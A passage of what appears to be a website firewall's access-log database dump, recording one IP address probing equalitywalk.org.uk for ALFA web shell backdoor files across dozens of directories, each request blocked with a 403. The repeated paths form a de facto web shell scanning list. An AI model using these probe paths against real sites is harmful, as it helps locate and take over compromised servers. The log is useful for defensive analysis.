Safari\\/537.36\"}','gxR3aWpc0F5MQ2XAVBZmk9Gr',0,1674295757.5398,92,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/upload/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','EQZ9dRHiwmso6DWqGz5JIhb0',0,1674295757.8150,99,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/upload/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','7Kf4x9dlUtFHLJANqZiIaDhk',0,1674295760.4109,118,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/upload/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','jtMZRi5uWNnmwkTa4v3bEsdK',0,1674295760.8049,115,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/upload/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','Tk3av28ZJgbMy5U7Y6u1nRrt',0,1674295761.1291,101,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/uploads/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','6Z7jwkvhbpPdREGnUfxYmiJz',0,1674295763.6875,129,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/uploads/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','JnDuqpAOXTKS9WzsmdvIb25E',0,1674295764.0871,249,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/uploads/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','ra5gbU8MnfZClpNiOK07my6e',0,1674295764.5453,96,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/uploads/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','Ga65xBDwEhnFM7L2WAvcuqT1',0,1674295767.1564,101,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/uploads/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','CKrQntWc8MaueNLlhiPy5JBo',0,1674295767.4373,100,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/uploads/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','X2YJbSRKop7sQk5dCfL8mvWn',0,1674295767.8311,114,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/assets/upload/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','nUYxpd2ES1QXuDmOaqJrNZC9',0,1674295770.6579,99,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/assets/upload/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','t8msN75f91dl3ZycDES0Xkpo',0,1674295770.9780,135,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/assets/upload/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','OyP8VrZXzIp3cRU0TMbY6ven',0,1674295771.3272,107,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/assets/upload/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','wZNiMRkxaFcqW6ouXt34QPLg',0,1674295773.7287,93,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/assets/upload/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','MNckT7eP4SiRr0lYv3dyIfqn',0,1674295774.0124,99,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/assets/upload/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','M14dgaZsV6wAWUPltupkh83O',0,1674295774.3533,100,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/assets/uploads/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','dUwmNWquME9B6f43ItF8xKCY',0,1674295776.9120,101,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/assets/uploads/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','DzTgSP6FCRk0HYocVbMQU7i8',0,1674295777.2356,92,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/assets/uploads/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','go9afVPUyebim6nX5YxKNERc',0,1674295777.5678,93,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/assets/uploads/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','2wjazq0cO7MJSZprmVK8U4Fb',0,1674295780.5583,94,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/assets/uploads/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','sRr1iKvw90npcY4Cb2PoqzGO',0,1674295780.8652,86,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/assets/uploads/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','Fc1DzdRilstVauw6Uv4EO0CQ',0,1674295781.1534,87,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/wp-admin/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','Lfj5xwsTPqi7Co3AD6znWv0h',0,1674295812.2843,94,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/wp-admin/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','i5E6UDecKxhaL29qg0nbWRIw',0,1674295812.5468,95,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/wp-admin/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','QV0nhM94L5KpNRmZTSbXkoeG',0,1674295812.8188,91,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/wp-admin/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','mdPCx75LOgMQDcwrTJNtoYfb',0,1674295814.8070,113,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/wp-admin/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','U5HjMwFnaNRqxl63Q8emvy2u',0,1674295815.1055,110,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/wp-admin/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','SxgqERpr37zsa5vfiw0d96Xk',0,1674295815.3855,136,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/wp-includes/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','ykqgbG71hHvr8BMLaIxjlWFE',0,1674295818.2696,88,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/wp-includes/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','AmQl56OxUa7weEChDR8GSqZv',0,1674295818.5474,126,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/wp-includes/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','awWg4XzS8V9xcBoh01UD3nki',0,1674295818.8426,94,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/wp-includes/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','wHxdCsDn8J0BVugOQiWYkojc',0,1674295820.7854,94,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/wp-includes/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','84GwiAVMN7ROm6J2WZd5tfBj',0,1674295821.0486,96,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/wp-includes/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','lAfeVnd41gBWv80FDbYPxTtL',0,1674295821.3414,98,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.well-known/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','2jubFdEOZHy936Q0xBCGvU5z',0,1674295823.3366,97,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.well-known/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','Sa46Ay2lpD5vcR9bTFudWJrX',0,1674295823.6101,113,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.well-known/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','LyqrOJsEAKlQGDICV8g4ajX1',0,1674295823.9051,112,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.well-known/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','miqGI07btsRKgyPLoOl6pz23',0,1674295825.8215,122,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.well-known/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','w9Kb0FXapCV2hGi5qNUygorY',0,1674295826.1241,114,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.well-known/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','Amd8xv7HLoa6yE1RjPTbBfD0',0,1674295826.4233,95,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.well-known/acme-challenge/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','Fp3NxWhrGeC6mXS0RZ1KBiDQ',0,1674295828.4132,153,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.well-known/acme-challenge/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','ftquwpDOlg96IxH3rzA5dTJR',0,1674295828.7433,119,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.well-known/acme-challenge/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','oBUJWthKSv8NfFRgPzuIXd3G',0,1674295829.0681,123,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.well-known/acme-challenge/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','MPcD2CLTJSbBwZH4Wiqg8tIA',0,1674295831.1405,117,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.well-known/acme-challenge/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','SCr81s3q4i0PNyUVDWRmIoTu',0,1674295831.4418,291,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.well-known/acme-challenge/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','10dCh23uElqWoRvaXN5ApVIP',0,1674295831.9207,103,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.well-known/pki-validation/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','q426utKXZH8Lxb0mQAvEsyJS',0,1674295834.2214,96,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.well-known/pki-validation/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','C6YtRci38azNkGmBT7jUIpVh',0,1674295834.4958,94,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.well-known/pki-validation/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','X7HLbI95qQwyJd6VECUt8YZ2',0,1674295834.7678,97,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.well-known/pki-validation/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','YA7qzciWO0b1x3CvEg6kwHde',0,1674295836.7468,87,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.well-known/pki-validation/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','KGQoYVbA2zxdfgD0EL4NiPlB',0,1674295837.0048,84,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.well-known/pki-validation/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','W2uDFoJ5qR1Gk6cMnlpdPHUT',0,1674295837.2711,91,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.tmb/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','Ktekwu28xlcD0LWmP4h73Jyf',0,1674295839.2502,91,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.tmb/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','Vz59j1knZIqDXWMEQ7fRaA4y',0,1674295839.5197,95,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.tmb/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','qePRhrg2iksHQT6dD7ocSNZA',0,1674295839.8325,89,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.tmb/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','vslwZDy5TfL8IBzkq4eWXMO2',0,1674295841.7950,97,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.tmb/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','kmIzYAuZWxyU2FHEsPOf04w7',0,1674295842.0823,142,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.tmb/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','HDE9vz4TcyGnXqialeN813ru',0,1674295842.4030,130,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.quarantine/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','GIEmTOvkxwrHDnZtN49SLYA2',0,1674295844.4478,131,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.quarantine/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile 